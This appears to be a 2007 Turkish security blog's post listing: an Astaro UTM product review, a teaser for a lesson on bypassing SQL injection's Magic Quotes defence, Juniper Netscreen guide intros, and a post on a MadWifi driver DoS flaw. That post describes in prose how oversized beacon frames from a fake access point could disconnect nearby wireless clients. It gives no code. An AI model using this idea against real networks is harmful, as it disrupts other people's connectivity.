Klasik olarak Packet ve Protocol filtrelememizi sağlayan Firewall(Packet Filter)
Hali hazırda 6.000'den fazla gelen ve real-time update'ler ile 0 Day Protection sağlayan IPS(Intrusion Prevention System)
VoIP paketlerinizi korumak için VoIP Security
HTTP ve FTP trafiğinizi virus,spy,mal tarzı zararlı paketlerden filtreleyen,bunun dışında ActiveX,Java,Javascript,FlashObjects gibi dinamik web içeriklerini tarayabilen ve ayrıca toplam 60 adet Web kategorisi içinde url filtering sağlayan Web Security
Network'ünüzde hem bandwith tüketen hem de zararlı içerikleri rahatça networke sokabilen Instant Messaging ve P2P yazılımlarını gateway'den filtreleyen IM/P2P Security
SMTP/POP3 üzerinde Anti-X denetleyen,kullanıcıların kendi karantina raporlarını görmelerini sağlayan anti-spam sistemini barındıran ve Gateway üzerinde Mail şifreleme işlemi yaparak mail trafiğinin güvenli olmasını sağlayan Email Security.

Bunun yanında her UTM cihazında bu kadar detaylı olmayan güzel bir log sistemi,yine her UTM cihazında olmayan SSL VPN özelliği,Active Directory entegrasyonu gibi daha birçok güzel özellik barındırmaktadır.Her ne kadar güvenlik açısından UTM ürünlerini tavsiye etmesemde,şirket politikası gereği UTM kullanma durumunuz varsa Astaro'yu tavsiye ederim ve UTM konusunda en iyi ürün olduğunu belirtmek isterim.Bu ürünü ülkemize Yaz Bilgi Sistemleri A.Ş getirmektedir.

Ayrıca Astaro Security Gateway ile ilgili daha detaylı bilgiyi buraya tıklayarak edinebilirsiniz.

Son olarak aşağıda ürün ile ilgili bazı ekran görüntüleri yer almaktadır;

SQLi 104 : Magic Quotes

Sun, 25 Nov 2007 15:39:24 GMT

Magic Quotes nedir, nasıl çalışır , nasıl aşılabilir , nasıl aşılamaz gibi sorulara yanıt arayan, teori dersi olsa da Magic Quotes ile ilgili lab dersi yaptırmaya gerek kalmayacak kadar uygulamalı, 100 kodlu derslerimizin sonuncusu.

Juniper Networks Netscreen SSG-X 2

Thu, 22 Nov 2007 15:59:09 GMT

Merhabalar bir Netscreen klavuzunda daha yine karşınızdayız. Aslına bakarsanız bu bölümü bu kadar erken yazmayı planlamıyordum fakat sizlerden almış olduğumuz olumlu tepkiler sonucu daha fazla bekletmek içimden gelmedi.İlk yazının sonunda bahsetmiştim PPP,VPN ve güvenlik yapılarına değineceğimi fakat bunların sıralaması henüz kafamda canlanmamıştı,o aralar öncelikli olarak güvenlik yapılarından bahsetmeyi planlasam bile internet'e çıkmayan bir Netscreen üzerinde güvenlik yapılandırmak pek mantıklı gelmedi ve PPP tanımlamalarını öne almayı uygun gördüm. Aslına bakarsanız Netscreen üzerinde çok fazla zaman kaybı yapmak istemiyorum çünkü elimizde sizlere sunabileceğimiz yazılım ve donanımlar çok daha fazla heyecan verici,şimdiden isimlerini söylemeyip süpriz hissi yaratmak istiyorum fakat Netscreen yazısı dizisinden sonra güvenlik dünyasında çok konuşulan ve yeni release olmuş ürünleri sizlerle inceleyeceğiz.

Juniper Networks Netscreen SSG-X

Mon, 12 Nov 2007 13:49:17 GMT

Amacı ülkemizde ve dünyada bilişim güvenliği hakkında sizleri aydınlatmak olan H-Security Labs'ın ilk ürün kurulum kılavuzu,ülkemizde oldukça popüler olan all-in-one güvenlik box'larından birisi Juniper Networks Netscreen SSG serisi.Netscreen'in neredeyse tüm modellerinde benzer firmware kullanıldığından dolayı yönetim interface'leri ve içinde barındırdığı özellikler neredeyse aynı.Model'den modele değişen özellikler,bazılarına interface takılabiliyor olması,bazılarının ethernet interface sayılarının fazla olması,bazılarının adsl interface'i üzerinde gelmesi ve bunun dışında concurrent kullanıcı sayıları,vpn sayıları,bandwith çıkışları gibi performans detayları.

MadWifi Driverlar ve DoS!

Wed, 07 Nov 2007 23:59:25 GMT

Wireless Pen-Testing yapmadan önce alet çantanızı hazırlamak her zaman çok kolay olmayabilir . Öncelikli olarak testin verimli olmasını istiyorsanız stable bir linux sistem kurmaktan WLAN kartınızın driverlarını yüklemeye, olmadı kernel compile etmeye ve haricinde gerekli yazılımları kurmaya kadar uzanan doğrultuda bir todo listiniz var demektir.Aslında elinizdeki WLAN kartınız ve işletim sisteminize dayalı olarak bu iş çok kolaylaşabilir, hazır güvenlik distroları bu konuda yardımızına koşabilir.

Şüphesiz ki bu işlemler arasındaki en kritik yer WLAN kartınızla kablosuz ağa paket enjekte edebilmenizi,ağdan paket dinleyebilmenizi, kısacası WLAN kartınızı etkili biçimde kullanabilmenizi sağlayacak olan driver'ın yüklenmesi işlemidir. Laptopunuz ile birlikte gelen Intel Centrino 2200 b/g WLAN kartınızın injection sürücülerinin çok kısıtlı olduğunu, olanların da auth/assoc/disassoc/deauth gibi management frameleri enjekte edemediğini görünce eminim siz de çok üzüleceksiniz! Ama eğer elinizde Atheros chipsetli bir kartınız varsa, büyük ihtimalle kullanacağınız driver'lar MadWifi olacaktır.

MadWifi, driverlar dünyasında çok kullanılan buna bağlı olarak da fazlaca dökümantasyon & destek bulabileceğiniz driver'lardan biridir.

Tüm bu blogpost'u, az önce mesaj kutuma düşen güvenlik uyarısı üzerine yazdım.MadWifi driverların extended supported rate elemanı normal büyüklükten fazla bir beacon frame'i işlemesi sırasında DoS'e sebep oluyor.Aslında açık çok basit bir şekilde farkedilebilir durumdaymış, ve fix adına yapılan , bu değeri kontrol edip gerekirse değeri arttıracak bir makro tanımlayıp kullanmak.Açığın fix edilmesi için, kodda ne gibi değişiklikler yaptıklarını, ne ekleyip ne çıkardıklarını güzel bir renklendirmeyle birlikte yayınlamışlar : http://madwifi.org/changeset/2736

Beacon frame dediğimiz hadise, AP'nin herhangi bir kanaldan "ben buradayım, bağlanabilirsin" diye bağırması daha doğrusu etraftaki kablosuz ağı tespit etmenizi sağlayan frame'lerdir.Zayıflık tam olarak nasıl pratik atak şansları veriyor, -exploit falan görmedim,gerçi gerek de yok bir değeri set edip paket göndermek yeterli - bilemiyorum fakat kendisini AP gibi gösteren saldırganın, kötü beacon frame'lerle ortalığı ayaklandırması durumunda tüm wireless client'ların hattan düşmesi çok enteresan olabilirdi!

MadWifi v0.9.3.3 sürümü öncesi zayıflıktan etkileniyor, zaten 0.9.3.3 te http://www.madwifi.org dan yayınlanmış.

Aslında changeset ve diğer referanslara göre açık publish edileli 20 gün kadar olmuş; fakat Gento Security Advisory'sinin şimdi gelmesinin sebebini gecenin şu saati itibariyle ne anlayacak, ne de araştıracak halim yok.

Haricinde, olayla ilgili daha derinlemesine araştırma yapacak arkadaşlarımız için de CVE linkini esirgemeyiz.